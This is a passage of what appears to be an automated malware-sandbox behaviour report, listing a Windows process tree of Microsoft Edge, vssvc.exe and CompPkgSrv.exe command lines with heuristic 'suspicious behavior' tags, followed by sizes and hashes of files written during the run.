C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:5172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:15⤵PID:5188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:15⤵PID:5196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:15⤵PID:5488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:15⤵PID:5596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:15⤵PID:2736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10538521359070323398,14154385130905003082,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1800 /prefetch:15⤵PID:2536
-
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1420
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2876
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD54d846887950a931b9635f1774c8fdf70
SHA1d95225fec82f9c4f155b1baceafa63058cefb63b
SHA256e85bda6aa9d0383fe7c61778ba83ac329ce3cd0d3b174a1cd37adea51561b23e
SHA5124074bc5643de5e95dcf789ab27e7941eb94e779adfdfe8a4768d9023d893914870c76a5578c96f847803188ff27ab18c51e036a118d1eb849789736216321357
-
Filesize
152B
MD5612a6c4247ef652299b376221c984213
SHA1d306f3b16bde39708aa862aee372345feb559750
SHA2569d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a
SHA51234a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973
-
Filesize
152B
MD556641592f6e69f5f5fb06f2319384490
SHA16a86be42e2c6d26b7830ad9f4e2627995fd91069
SHA25602d4984e590e947265474d592e64edde840fdca7eb881eebde3e220a1d883455
SHA512c75e689b2bbbe07ebf72baf75c56f19c39f45d5593cf47535eb722f95002b3ee418027047c0ee8d63800f499038db5e2c24aff9705d830c7b6eaa290d9adc868
-
Filesize
6KB
MD51dd5da65f7e43c880ff053aac9abdc69
SHA18d9f8646eb85358b5ff2a6f823e669d25b37bf6e
SHA256b8710849e26a5fe393f0612a9e974bb61432015a790334b9cba8f7654fc277e3
SHA5121b101470e4ebdfdf1d9c3f0ed96383437f67d7809729ee677b7858261d5e0f8c3a0a5c65dd14a73d927ce91bb243e678ee8a24a9dc9bc3e8e46955b42ad2020f
-
Filesize
5KB
MD56e3b15b1ed2ab1c824c4e6487f8b93f3
SHA10851b0a49d4dbbebf26c8ab4b918dc6fc2ba711b
SHA25692f902e528cf383cd197503bec20f24535e501acfa14eea812a8339e8fdd11ad
SHA5123245efae35e7fb313519714f00b340e56378f6c3db9cba04330b9f55a95075b6509260e6bcda0b91ef24f9653cffec4d5bfb81f22ddbda83431fc4365d057683
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
11KB
MD5ef8d5e7f06540af2f8d5a061dcd9c018
SHA1277c075cb60e5c1564507f7aa7dcca870a6991b0
SHA256bdeec4a7ab6774cb4f0d8a0a278b6a9364619c4631464e893ea20db51d80aafe
SHA512aae576d9ad237b89ae215c2a5ac2f1b59062c77a38ca91d551ca18a71d168c093cf37f2c8d6ba328844ef3b60353974114659702ef814444c69a3a60d1db2eee
-
Filesize
17KB
MD5aa2b401976fa12aeb66bce4c7e83b9d9
SHA10dae7ceb38a16050d35beec4b7858c5ad0e58b8e
SHA2567e35ae2561e8e179402b88312c8ede9adb10a36b61aaeb4a5e266691c0208f97
SHA5124f3262a1a2ab7159fe2af11926c2a8d02ef422559e8ff4f0832367aefb0709a510f48fea2c22b89ff49f3b9804e5f7a6a627a6031a35516c05da4810ec1083cd
-
Filesize
1KB
MD5947919690674ae37064deafb3fa326db
SHA1b79f7f3ad22c9e84546750502f517d16a7618366
SHA256fa4d045e690fbaa4f22fc3827f168e59791e1677ee6c5888a37aa8caf964d801
SHA512c7fcc911acc3084985f07add40a0a41d6628ca567016551196744444e39a562444385647ea5741357bf8bc49695e9cd83cb9d6c45be6f71ef31263b52ba0e32b
-
Filesize
4KB
MD5a756835ce38c068139d8fad26cb47fed
SHA1c1bb3d145188606d07e7b29d86ea6a08586e268d
SHA256d5cfccfe2e3f5ecb566543c74f2972176f61a857234fd33a48325e9459742a78
SHA512d18aa222daf8c3e51e5bf58d2c6ff531b0db92a03f8546efa8add0ac77de4649b1cc73811ad991cc75eb2a9eb22b07ca5d0924569440aba99ce0416527547fac
-
Filesize
56KB
MD591de8a79098ac3d20726e1acb50cd05d
SHA19cb04003c75f0cb63fe0c6dcd22a0c64d63154be
SHA25654f8d71fb3117854743d594aa28427b943e5b2fb46f6003dbf4a9b562ebbfcea
SHA51270cf1fe2c4d9b68c12b30df9013c4a1fd5b5a9fef1de704a42535259d1196b35eca6191270b19dedc4d3699b8211868b6b31a5ae3cccdc24711fb335fc32edc3
-
Filesize
96KB
MD542ad49ed99c0d41a820316309bc2c3b3
SHA1f447a72b3cbea72e1b56fda8f44fd9f304b4474a
SHA25641ef278a866d57e3c81882e4ad7f6d04ae6b066cfd5632120d9ac4332d66753e
SHA5124e0af295dc656ad70361363c77646fb899a1ff4a816790959e090125bdba2089eb058dfa2b18bdcede34b45d9420b6f57c0db6aefa32f9799eccec3f163bdf75
-
Filesize
23.7MB
MD5d56556a295262e2749d7c618ef15a8f2
SHA11c15d8108be9300335205ea330049db1603cc9d4
SHA2566e039222f7f56a5e89d7412df7642f172acfd7de2eff117ddd3119dcb3fc6948
SHA51232c48566cd701a866d6cdd9443ff0d6533a3d949bc1a49febe867011f90d3e0cf59015f251bf9fa436ab3ed6d011fd157ff8a8a33a6f12f92815077dd508f01a
-
\??\Volume{8fc740eb-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{903da240-7bac-4f63-b5cd-ee6a7721d15c}_OnDiskSnapshotProp
Filesize6KB
MD55dcdee154fd89f61245ee37ea0209d5e
SHA1ca6460ee6c89974bcf78343b08380287ba237703
SHA25660cacf2eecf6841ab7c67bdbf9da1d6f288a26a2ee501001d23a9d94b87513c3
SHA512c2cc6d8806269010278e2521a6cd19698b638d132e774a33cb13b28bed141814b86a0181cfa796e07685c2e0969782d28d059212964238aa4c3ecfa408d5144d
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e